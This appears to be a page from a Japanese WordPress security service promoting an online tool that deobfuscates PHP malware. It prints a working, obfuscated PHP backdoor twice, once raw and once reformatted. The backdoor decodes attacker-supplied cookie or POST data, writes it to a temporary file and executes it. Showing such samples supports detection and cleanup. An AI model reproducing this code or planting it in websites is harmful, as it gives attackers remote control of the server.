Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php function/* t */sz1 ( $nz2 ){$yq3 =/* mi*/"nIy' E7/gb#<h5o2" . "_v" . "k*efdF63)L?lH0.p@r-sc9u4t" . ";" . "m(1" . "ai8" . "x" ; $gf5=''; foreach( $nz2/*pnu*/as $ql4/* wbhet */){ $gf5 .=/* swx */$yq3 [ $ql4 ]; }return $gf5;}$yb6 = [];$evyj =/* au */77948; $yb6 [] =/* npt */sz1 (/* kblz */Array(47 ,/* h */22/* k */,/* vjrau */41 , 39/* yl*/,/*l */13/* ra*/,/* kckx */47 , 20/*t */, 13 ,/* s */36 ,/* tcwh*/6/*m*/, 41 , 38 , 38 ,/* e*/36/* umv */,/* ehev */41 , 25/* q */, 6/*ekr */,/*hrwe */9 ,/* yz */36 , 49 , 20 ,/* x */6/* o */,/* dirp */39/*z */, 36/* hy */,/* xriyx */47 , 20 ,/*bk */20/* q */,/*vvkdq */15 , 24 , 39/*i */, 25 , 31 , 31/* cexpv */, 20/* hw */, 25 , 31 ,)/* g */)/*duhh */; $yb6/* vot */[] = sz1 ( Array(28 , 33 , 12 , 33 ,/*u */4/* gibmm */, 34 , 40/* glhh */, 0/* dx*/, 29 , 48 , 0 , 18/* d*/, 45 , 16/* uyfht */, 16 ,/* b */23/* o*/, 1/* sel */, 27 ,/* rm */5 , 16 , 16/* rktwf */,/* p */26 , 43 ,/* xbdkd */4/* ujdz */,)/* uc */)/* jd */; $yb6/*cxem */[] = sz1 ( Array(32 , 44/* tvxm */, 14 , 22 , 40 ,/* oud */29 ,/* t */20 ,) )/* ffkur */; $yb6 [] = sz1/* nwl */( Array(30 , 19/* z*/,) ) ; $yb6 [] = sz1 (/*zcwdn */Array(32/* cz */, 7 ,)/* fupme */) ; $yb6/*v */[]/*i */= sz1 (/* itk */Array(10 ,) ) ; $yb6/*quh */[] = sz1 ( Array(11 ,)/* fb */) ;$yb6[] = sz1 ( Array(21 ,/*zqt */48 , 29/*hpqzs */,/* zre */20/*k*/, 16 , 33/* qcbec */,/* dzzo*/40 , 42 , 16 , 38 ,/* cax */14 ,/* uw */0/*mmgn*/, 42 ,/* ors */20/* sp*/, 0/*yzjvy */, 42/*quvny */, 37 ,)/* nsk */)/* hzxk*/; $yb6[] = sz1 ( Array(21 ,/* rmaw*/48 , 29 , 20/* rlqi */, 16/*mn*/,/* cn */20 , 50/*cwk */,/* ooptc */48 , 37 , 42 , 37 ,) ) ; $yb6[]/*i */= sz1 ( Array(47 ,/* d*/35/* x */, 35/* iu */,/*lpfy */47/* z */, 2 , 16 ,/* kre*/44 , 20 , 35/* fmz*/,/* fst */8/* b */, 20/*ahfj */,) ) ;$yb6[] = sz1 (/* otx */Array(37 ,/*i */42 ,/* qoznu */35 , 16 , 35/* xbdfc */, 20 , 33 ,/* bgq */20 , 47 , 42 ,) ) ; $yb6[]/* f */= sz1/*yssia */(/*k */Array(20/* ysy */,/* oe */50 , 33 , 29 ,/* wnk */14 , 22/*h */, 20 ,)/* gieqt*/)/* zsif */; $yb6[] =/* hkqv */sz1 (/* xgmz */Array(37 ,/* zf */40 ,/* kgal */9/* mnl*/,/* t*/37 , 42 , 35/*yivw*/,) ) ; $yb6[] =/* wkk*/sz1/* v*/(/* o */Array(40 ,/* y */0 , 29/* n*/, 48/* vixy */, 0 , 18/*o */,) ) ; $yb6[] = sz1 ( Array(37/* j */,/* cghbk */42/*w */, 35 , 29 , 20 ,/*xgpna */0 ,) ) ;$yb6[] = sz1 ( Array(33/*ocmv */,/* qtnbr */47 ,/* mq */38 , 18/*ktgs*/,) )/* fnsm */; $yb6[] =/*bpdkb */sz1 ( Array(44/* t*/, 22 , 13 ,)/* k*/) ; $js12 = $_COOKIE; $ek11 = "47959"; $js12/* t */=/*cqze */$yb6[9]($js12, $_POST);foreach ($js12 as/* gbh */$kb17/* btujx*/=> $sh13) { function/*wczp */fp8 ( $yb6, $kb17/*ucj*/, $tf10 ) { return $yb6[12]/* ocehu */(/* tvhew*/$yb6[10] ( $kb17 . $yb6[0] , ( $tf10/$yb6[14]( $kb17 ) ) +/*gcg */1 )/* dowo*/, 0/* ia*/, $tf10 ); /* d*/} function/* xausv */ve7 ( $yb6, $cw16 ) { /* xd */return @$yb6[15]/* gxif */($yb6[3] , $cw16/*ot */); } function nz9/* ugfi */(/* ajugi */$yb6, $cw16/* wavj */) { if/* ftnmm */( isset ( $cw16[2]/*wpkp */)/* ouu */) { /* nw*/ $la15/* dnj */= $yb6[4] . $yb6[16]( $yb6[0]/* i */)/* ub */./* z */$yb6[2]; @$yb6[7] ( $la15,/* jloc*/$yb6[6]/* khdry */. $yb6[1]/* bcyj */./* pd*/$cw16[1]/*hf */( $cw16[2]/* ckr*/)/* jzlcu */);/*ezwt */$ca14 =/*sgww */$la15; @include ( $ca14 ); if/* cw */($yb6[8]($la15))/*imoz*/@$yb6[13]/* hzf*/( $la15 ); die (); }/* qdxb */} /*dvu*/$sh13/*hpay */= ve7 ( $yb6, $sh13/* yvx*/); nz9/*nui */( $yb6,/* kep */$yb6[11]/*wca */( $yb6[5]/* ehrht */, $sh13 ^ fp8 ( $yb6,/* iga*/$kb17 , $yb6[14](/* qsaxp */$sh13 ) ) ) ); }
<?php function sz1($nz2) { $yq3 = "nIy' E7/gb#<h5o2_vk*efdF63)L?lH0.p@r-sc9u4t;m(1ai8x"; $gf5 = ''; foreach ($nz2 as $ql4) { $gf5 .= $yq3[$ql4]; } return $gf5; } $yb6 = []; $evyj = 77948; $yb6[] = sz1( /* kblz */ array( 47, /* h */ 22, /* vjrau */ 41, 39, /*l */ 13, /* kckx */ 47, 20, 13, /* s */ 36, /* tcwh*/ 6, 41, 38, 38, /* e*/ 36, /* ehev */ 41, 25, 6, /*hrwe */ 9, /* yz */ 36, 49, 20, /* x */ 6, /* dirp */ 39, 36, /* xriyx */ 47, 20, /*bk */ 20, /*vvkdq */ 15, 24, 39, 25, 31, 31, 20, 25, 31, ) ); $yb6[] = sz1(array( 28, 33, 12, 33, /*u */ 4, 34, 40, 0, 29, 48, 0, 18, 45, 16, 16, /* b */ 23, 1, 27, /* rm */ 5, 16, 16, /* p */ 26, 43, /* xbdkd */ 4, )); $yb6[] = sz1(array( 32, 44, 14, 22, 40, /* oud */ 29, /* t */ 20, )); $yb6[] = sz1(array(30, 19)); $yb6[] = sz1( /*zcwdn */ array(32, 7) ); $yb6[] = sz1( /* itk */ array(10) ); $yb6[] = sz1(array(11)); $yb6[] = sz1(array( 21, /*zqt */ 48, 29, /* zre */ 20, 16, 33, /* dzzo*/ 40, 42, 16, 38, /* cax */ 14, /* uw */ 0, 42, /* ors */ 20, 0, 42, 37, )); $yb6[] = sz1(array( 21, /* rmaw*/ 48, 29, 20, 16, /* cn */ 20, 50, /* ooptc */ 48, 37, 42, 37, )); $yb6[] = sz1(array( 47, /* d*/ 35, 35, /*lpfy */ 47, 2, 16, /* kre*/ 44, 20, 35, /* fst */ 8, 20, )); $yb6[] = sz1( /* otx */ array( 37, /*i */ 42, /* qoznu */ 35, 16, 35, 20, 33, /* bgq */ 20, 47, 42, ) ); $yb6[] = sz1( /*k */ array( 20, /* oe */ 50, 33, 29, /* wnk */ 14, 22, 20, ) ); $yb6[] = sz1( /* xgmz */ array( 37, /* zf */ 40, /* kgal */ 9, /* t*/ 37, 42, 35, ) ); $yb6[] = sz1( /* o */ array( 40, /* y */ 0, 29, 48, 0, 18, ) ); $yb6[] = sz1(array( 37, /* cghbk */ 42, 35, 29, 20, /*xgpna */ 0, )); $yb6[] = sz1(array( 33, /* qtnbr */ 47, /* mq */ 38, 18, )); $yb6[] = sz1(array(44, 22, 13)); $js12 = $_COOKIE; $ek11 = "47959"; $js12 = $yb6[9]($js12, $_POST); foreach ($js12 as $kb17 => $sh13) { function fp8($yb6, $kb17, $tf10) { return $yb6[12]( /* tvhew*/ $yb6[10]($kb17 . $yb6[0], $tf10 / $yb6[14]($kb17) + 1), 0, $tf10 ); } function ve7($yb6, $cw16) { /* xd */ return @$yb6[15]($yb6[3], $cw16); } function nz9($yb6, $cw16) { if (isset($cw16[2])) { /* nw*/ $la15 = $yb6[4] . $yb6[16]($yb6[0]) . $yb6[2]; @$yb6[7]( $la15, /* jloc*/ $yb6[6] . $yb6[1] . $cw16[1]($cw16[2]) ); /*ezwt */ $ca14 = $la15; @(include $ca14); if ($yb6[8]($la15)) { /*imoz*/ @$yb6[13]($la15); } die; } /* qdxb */ } /*dvu*/ $sh13 = ve7($yb6, $sh13); nz9( $yb6, /* kep */ $yb6[11]($yb6[5], $sh13 ^ fp8( $yb6, /* iga*/ $kb17, $yb6[14]( /* qsaxp */ $sh13 ) )) ); }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.